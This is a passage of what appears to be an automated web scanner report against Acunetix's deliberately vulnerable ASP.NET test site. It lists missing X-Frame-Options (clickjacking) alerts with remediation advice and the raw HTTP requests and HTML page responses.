#e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/ads/def.html
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (355 bytes)
GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (246 bytes)
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Fri, 24 May 2019 07:50:37 GMT Accept-Ranges: bytes ETag: "eb6cf45f512d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 488Response body (488 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title></title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"> <meta name="ProgId" content="VisualStudio.HTML"> <meta name="Originator" content="Microsoft Visual Studio .NET 7.1"> </head> <body> <P align="center"><STRONG>Is your website hackable?<BR> check with<BR> <IMG src="acunetix.gif"><BR> Web Vulnerability Scanner</STRONG></P> </body> </html>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 13707Response body (13707 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 14245Response body (14245 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 